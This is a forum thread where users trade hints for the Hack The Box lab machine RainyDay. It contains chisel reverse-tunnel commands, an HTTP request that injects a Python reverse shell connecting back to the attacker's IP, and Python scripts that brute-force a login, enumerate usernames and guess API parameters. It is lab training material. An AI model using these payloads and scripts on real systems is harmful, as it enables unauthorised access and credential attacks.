Return to forum
RainyDay - HTB [Discussion]
by - Thursday, January 1, 1970 at 12:00 AM
Elite User
Elite
Posts: 166
Threads: 0
Joined: N/A
Reputation: 5

#31
October 15, 2022 at 10:19 PM
with chisel better you proxychains with socks5

you will able to  run nmap and another tools.

you can put in you browser proxy settings 127.0.0.1 sock5 port and  change in you /etc/hosts ip 172.18.0.1

./chisel server -p 8001 --reverse

./chisel client IP:8001 R:1080:socks

edit /etc/proxychains4.conf

socks5 127.0.0.1 1080

test proxychains nmap 172.18.0.1 

all good ?

add in you browser 127.0.0.1 1080 sock5 and try access again dev.rainycloud.htb

if you are using foxyproxy addon. disable Send DNS through SOCKS5 proxy
Reply
Member
Member
Posts: 30
Threads: 0
Joined: N/A
Reputation: 1

#32
October 15, 2022 at 10:26 PM
(October 15, 2022, 10:19 PM)yumi Wrote: with chisel better you proxychains with socks5

you will able to  run nmap and another tools.

you can put in you browser proxy settings 127.0.0.1 sock5 port and  change in you /etc/hosts ip 172.18.0.1


./chisel server -p 8001 --reverse

./chisel client IP:8001 R:1080:socks

edit /etc/proxychains4.conf

socks5 127.0.0.1 1080

test proxychains nmap 172.18.0.1 

all good ?

add in you browser 127.0.0.1 1080 sock5 and try access again dev.rainycloud.htb

if you are using foxyproxy addon. disable Send DNS through SOCKS5 proxy


I'm dumb... thanks!
Reply
Member
Member
Posts: 22
Threads: 0
Joined: N/A
Reputation: 0

#33
October 15, 2022 at 10:34 PM
Request :

POST /containers HTTP/1.1
Host: rainycloud.htb
Content-Length: 305
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Content-type: application/x-www-form-urlencoded
Accept: */*
Origin: http://rainycloud.htb
Referer: http://rainycloud.htb/containers
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: session=eyJ1c2VybmFtZSI6ImdhcnkifQ.Y0sdWA.3B7E0YbxhG1Dp-Epq1P7o0_mgLk
Connection: close

action=execdetachsh+-c+python3+-c+%27import+os%2Cpty%2Csocket%3Bs%3Dsocket.socket%28%29%3Bs.connect%28%28%2210.10.17.168%22%2C4545%29%29%3B%5Bos.dup2%28s.fileno%28%29%2Cf%29for+f+in%280%2C1%2C2%29%5D%3Bpty.spawn%28%22%2Fbin%2Fsh%22%29%27&id=aad40c4a9464f675a33645d6111e28b6b73919a6f651865ce1752e6527046e82

Response :
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 15 Oct 2022 22:33:46 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 7
Connection: close
Vary: Cookie

Success

but no revshell
Reply
Member
Member
Posts: 30
Threads: 0
Joined: N/A
Reputation: 1

#34
October 15, 2022 at 11:13 PM
Y'all also have "missing parameter" when trying to talk to that /api/healthcheck through POST method?
Reply
Member
Member
Posts: 21
Threads: 0
Joined: N/A
Reputation: 0

#35
October 15, 2022 at 11:32 PM
(October 15, 2022, 10:18 PM)dumpsterX0 Wrote:
(October 15, 2022, 10:12 PM)Hacker2222 Wrote:
(October 15, 2022, 10:11 PM)dumpsterX0 Wrote:
(October 15, 2022, 10:08 PM)Hacker2222 Wrote:
(October 15, 2022, 10:06 PM)dumpsterX0 Wrote: still failing to get a reverse shell
anyone post a req method


use python3 rev shell and execute /bin/sh not /bin/bash also use in background button


yes i did everything. but no connection


what revshell u execute?


python3 shortest

Are you remembering to use the VPN connection and not just the normal IP?
Reply
Member
Member
Posts: 22
Threads: 0
Joined: N/A
Reputation: 0

#36
October 16, 2022 at 12:01 AM
how do you guys upgrade a shell?
Reply
Member
Member
Posts: 33
Threads: 0
Joined: N/A
Reputation: 0

#37
October 16, 2022 at 1:21 AM
Heres Some Python3 Code To Brute Force The Json Param

def json():
url = 'http://dev.rainycloud.htb/api/healthcheck'
headers = {"Cookie": "session=eyJ1c2VybmFtZSI6ImdhcnkifQ.Y0tZqA.dyJU8OGeizFy7KORBeL1POCH3bc", "Content-Type": "application/json"}
with open("/opt/wordlists/pams.txt", "r", encoding='latin-1') as file:
pams = file.readlines()
for pam in pams:
json = {f"{pam}":"test"}
print(Fore.RED + f"Trying Para: {pam}")
r = requests.post(url, headers=headers, json=json, verify=False)
if "missing parameter" not in r.text:
print(Fore.YELLOW + f"Parameter Found: {pam}")
file.close()
break

Make Sure To Indent it

I Had It Idented But The Form Un did it
Reply
Member
Member
Posts: 22
Threads: 0
Joined: N/A
Reputation: 0

#38
October 16, 2022 at 1:27 AM
(October 16, 2022, 01:21 AM)vuln63 Wrote: Heres Some Python3 Code To Brute Force The Json Param






def json():
url = 'http://dev.rainycloud.htb/api/healthcheck'
headers = {"Cookie": "session=eyJ1c2VybmFtZSI6ImdhcnkifQ.Y0tZqA.dyJU8OGeizFy7KORBeL1POCH3bc", "Content-Type": "application/json"}
with open("/opt/wordlists/pams.txt", "r", encoding='latin-1') as file:
pams = file.readlines()
for pam in pams:
json = {f"{pam}":"test"}
print(Fore.RED + f"Trying Para: {pam}")
r = requests.post(url, headers=headers, json=json, verify=False)
if "missing parameter" not in r.text:
print(Fore.YELLOW + f"Parameter Found: {pam}")
file.close()
break

Make Sure To Indent it

I Had It Idented But The Form Un did it

i was stucked too long in a tunnelling can you please explain me mate
Reply
Member
Member
Posts: 33
Threads: 0
Joined: N/A
Reputation: 0

#39
October 16, 2022 at 1:27 AM
(October 16, 2022, 01:25 AM)Hacker2222 Wrote:
(October 16, 2022, 01:21 AM)vuln63 Wrote: Heres Some Python3 Code To Brute Force The Json Param






def json():
url = 'http://dev.rainycloud.htb/api/healthcheck'
headers = {"Cookie": "session=eyJ1c2VybmFtZSI6ImdhcnkifQ.Y0tZqA.dyJU8OGeizFy7KORBeL1POCH3bc", "Content-Type": "application/json"}
with open("/opt/wordlists/pams.txt", "r", encoding='latin-1') as file:
pams = file.readlines()
for pam in pams:
json = {f"{pam}":"test"}
print(Fore.RED + f"Trying Para: {pam}")
r = requests.post(url, headers=headers, json=json, verify=False)
if "missing parameter" not in r.text:
print(Fore.YELLOW + f"Parameter Found: {pam}")
file.close()
break

Make Sure To Indent it

I Had It Idented But The Form Un did it


what is the result ?

I'[m Still Brute Forcing

I Also Tryed Some $eq $regex as parms But Nothing

I Just Finished No Results

Im Gunna Try A New Wordlist

(October 16, 2022, 01:27 AM)dumpsterX0 Wrote:
(October 16, 2022, 01:21 AM)vuln63 Wrote: Heres Some Python3 Code To Brute Force The Json Param






def json():
url = 'http://dev.rainycloud.htb/api/healthcheck'
headers = {"Cookie": "session=eyJ1c2VybmFtZSI6ImdhcnkifQ.Y0tZqA.dyJU8OGeizFy7KORBeL1POCH3bc", "Content-Type": "application/json"}
with open("/opt/wordlists/pams.txt", "r", encoding='latin-1') as file:
pams = file.readlines()
for pam in pams:
json = {f"{pam}":"test"}
print(Fore.RED + f"Trying Para: {pam}")
r = requests.post(url, headers=headers, json=json, verify=False)
if "missing parameter" not in r.text:
print(Fore.YELLOW + f"Parameter Found: {pam}")
file.close()
break

Make Sure To Indent it

I Had It Idented But The Form Un did it

i was stucked too long in a tunnelling can you please explain me mate


Sure You Have To Get A Shell On A container u Create I Went And used a python3 rev shell upgradeed to meterpreter uploaded a static nmap binary discovered hosts and used chisel to start a reverse tunnel to get access to the dev.rainycloud.htb and changed its ip to 127.0.0.1 in /etc/hosts 

and i used this to guide me with chisel syntax https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html

Btw After I Finish This Box I'm Writing A script that breaks Down How to Pwn The Box

This Is The Full Script I've Got So Far

#!/usr/bin/env python3

import requests
import sys
import colorama
from colorama import Fore

def brute():
url = 'http://rainycloud.htb/login'
headers = {"Content-Type": "application/x-www-form-urlencoded", "Referer": "http://rainycloud.htb/login", "Host": "rainycloud.htb"}
with open("/opt/wordlists/rockyou.txt", "r", encoding='latin-1') as file:
passwords = file.readlines()
for word in passwords:
data = f"username=jack&password={word}"
print(Fore.RED + f"Trying Password: {word}")
r = requests.post(url, headers=headers, data=data, verify=False)
if "Error - Login Incorrect!" not in r.text and r.status_code != 400:
print(Fore.YELLOW + f"Password Found: {word}")
break

def userenum():
url = 'http://rainycloud.htb/login'
headers = {"Content-Type": "application/x-www-form-urlencoded", "Referer": "http://rainycloud.htb/login", "Host": "rainycloud.htb"}
with open("/opt/wordlists/users.txt", "r", encoding='latin-1') as file:
users = file.readlines()
for user in users:
data = f"username={user}&password=test"
print(Fore.RED + f"Trying Username: {user}")
r = requests.post(url, headers=headers, data=data)
if "/var/www/rainycloud/./app.py:288" not in r.text:
print(Fore.YELLOW + f"Username Found: {user}")
c = input(Fore.YELLOW + "Would You Like To Keep Enumerating Y/N ")
if c == "N":
break
else:
continue

def json():
url = 'http://dev.rainycloud.htb/api/healthcheck'
headers = {"Cookie": "session=eyJ1c2VybmFtZSI6ImdhcnkifQ.Y0tZqA.dyJU8OGeizFy7KORBeL1POCH3bc", "Content-Type": "application/json"}
with open("/opt/wordlists/dirbuster.txt", "r", encoding='latin-1') as file:
pams = file.readlines()
for pam in pams:
json = {f"{pam}":"test"}
print(Fore.RED + f"Trying Para: {pam}")
r = requests.post(url, headers=headers, json=json, verify=False)
if "missing parameter" not in r.text:
print(Fore.YELLOW + f"Parameter Found: {pam}")
file.close()
break

json()
Reply
Member
Member
Posts: 33
Threads: 0
Joined: N/A
Reputation: 0

#40
October 16, 2022 at 1:39 AM
Also Don't Try To Forge Jwt Tokens Cus When I Tryed The /containers Got A Permenent 503 And I had To Restart The box
Reply


 Users viewing this thread: RainyDay - HTB [Discussion]: No users currently viewing.